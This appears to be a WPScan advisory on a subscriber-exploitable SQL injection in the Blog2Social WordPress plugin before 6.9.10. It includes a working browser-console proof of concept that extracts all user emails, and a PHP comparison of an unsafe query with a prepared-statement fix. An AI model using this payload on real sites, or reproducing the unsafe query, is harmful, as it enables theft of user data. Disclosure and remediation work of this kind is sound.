wpvulndb
Sakri Rafael Koskimies
WPVDB-ID: ECE049B2-9A21-463D-9E8B-B4CE61919F0C
History: Oct 03, 2022 - 12:00 a.m.

Blog2Social < 6.9.10 - Subscriber+ SQLi

2022-10-03 00:00:00
Sakri Rafael Koskimies
wpscan.com

EPSS

0.001

Percentile

37.7%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated user, such as a subscriber.

PoC

Run the script below in the web browser console while logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social) to get all registered user emails via the SQL injection.

// There needs to be at least one post in the wp_b2s_posts table (if the table is empty, simply create a dummy one directly in the DB)
// The b2s_post_id variable below needs to be one from the wp_b2s_posts table
// The current_user_id does not need to be the owner of the post

// Change ME!
current_user_id = 21;
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';
b2s_post_id = 1;

// Don't edit below
// First request to read data from any SQL table as a subquery and write to wp_b2s_posts
data1 = new FormData();
data1.append('action', 'b2s_update_approve_post');
data1.append('post_id', b2s_post_id);
data1.append('publish_link', "',publish_link=(SELECT/**/CONCAT('DATA_KEY=',group_concat(user_email/**/separator/**/';'))/**/FROM/**/wp_users),publish_error_code='',post_id=1337,blog_user_id=" + current_user_id + "/**/WHERE/**/id=1#");
data1.append('publish_error_code', '');
data1.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());
fetch(wp_site_ajax_url, { method: "POST", credentials: 'same-origin', body: data1 });

// Second request to fetch the data from wp_b2s_posts
data2 = new FormData();
data2.append('action', 'b2s_publish_post_data');
data2.append('postId', 1337);
data2.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());
fetch(wp_site_ajax_url, { method: "POST", credentials: 'same-origin', body: data2 })
  .then(response => response.json())
  .then(data => {
    const found = data.content.match(/DATA_KEY=[^>]*>/g);
    console.log(found);
  });
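To show the root cause and the fix side by side, here is an added illustration (not Blog2Social's own code) of a hypothetical admin-ajax handler that stores a publish link, first in the unsafe interpolated form the advisory describes and then with $wpdb->prepare() plus an authorization check. The table and column names come from the PoC; the function names, the nonce action string and the capability check are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Assumed: function names,
// the nonce action string, and that a row maps to a WP post for the
// capability check. Table/column names are taken from the advisory's PoC.

// UNSAFE: the request value is interpolated into the UPDATE, so a single
// quote in publish_link closes the string literal and the remainder of the
// value is executed as SQL with the site's database privileges. The nonce
// check only proves the request came from a logged-in session; it does not
// restrict the action to privileged users, which is why a subscriber suffices.
function b2s_like_update_unsafe() {
    global $wpdb;
    check_ajax_referer( 'b2s_security_nonce', 'b2s_security_nonce' ); // assumed action name
    $post_id      = $_POST['post_id'];
    $publish_link = $_POST['publish_link'];
    $wpdb->query( "UPDATE {$wpdb->prefix}b2s_posts SET publish_link='$publish_link' WHERE id=$post_id" );
    wp_send_json_success();
}

// SAFE: every user-controlled value is bound through $wpdb->prepare(), so the
// whole publish_link is stored as data regardless of quotes or comments, and
// the caller must be allowed to edit the referenced post, not merely logged in.
function b2s_like_update_safe() {
    global $wpdb;
    check_ajax_referer( 'b2s_security_nonce', 'b2s_security_nonce' ); // assumed action name
    $post_id      = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    $publish_link = isset( $_POST['publish_link'] )
        ? esc_url_raw( wp_unslash( $_POST['publish_link'] ) )
        : '';
    // Authorization: assumed mapping of the plugin row to a WP post capability.
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $wpdb->query( $wpdb->prepare(
        "UPDATE {$wpdb->prefix}b2s_posts SET publish_link = %s WHERE id = %d",
        $publish_link,
        $post_id
    ) );
    wp_send_json_success();
}
```

With the safe form, the PoC payload above is written verbatim into publish_link and the second request returns that literal string instead of the contents of wp_users.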

